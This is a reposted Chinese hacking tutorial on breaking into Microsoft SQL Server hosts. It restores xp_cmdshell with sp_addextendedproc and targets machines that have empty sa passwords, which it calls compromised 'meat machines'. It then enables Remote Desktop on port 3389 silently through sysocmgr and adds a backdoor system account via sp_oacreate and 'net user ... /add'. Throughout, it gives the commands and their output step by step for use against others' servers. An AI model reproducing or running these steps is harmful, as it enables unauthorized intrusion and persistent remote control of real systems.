SQL入侵恢复XP_CMDSHLL与开3389
一,用SQL連接器恢復XP_CMDSHLLE的命令
(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
(2)首先在SqlExec Sunx Version的Format選項里填上%s,在CMD選項里輸入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
去除
sp_dropextendedproc 'xp_cmdshell'
(3)MSSQL2000
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
修改sa密碼 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
這個很簡單,自己堵后門用:)
二,在可以運行XP_CMDSHELL的機器上直接開3389不需要上傳的
連接到主機:202.xxx.xxx.xxx //大家可以用sql連接器連上有空口令的sql肉機
命令:xp_cmdshell "type c:\boot.ini" // 輸入命令,看系統,server版的才能 開3389
執行成功,結果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盤根目錄建寫入一個文件,文件名duguxike大家可以自己改為自己的
執行成功,結果:
命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加寫入
執行成功,結果:
命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的內容是否正確
執行成功,結果:
[Components]
TsEnable = on
TsEnable = on
命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //開3389,成功的話過會肉機會重啟!!
執行成功,結果:
GetLocalManagedApplications returned (2)
之后就看大家的了,不過要記得冊除新建的duguxike文件哦!!
三,不需要XP_CMDSHLL直接添加系統帳號,對XPLOG70.DLL被刪很有效
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
第一條恢復如果XPCMDSHLL被刪了
第二條可以執行XPCMDSHELL但是無法利用差異備分來上傳的情況下使用(本人WIN2000下測試成功)
第三條XPLOG70.DLL被刪除的情況下直接添加帳號前提對方了開了3389 139 23
但是我現在無法在XPLOG70.DLL被刪而且沒有開3389的機器上拿到系統權限
哪為高人來指點一下!
轉載于:https://www.cnblogs.com/baogg/articles/2029946.html
總結
以上是生活随笔為你收集整理的SQL入侵恢复XP_CMDSHLL与开3389的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 程序员编程艺术:第二章、字符串是否包含问
- 下一篇: linux cmake编译源码,linu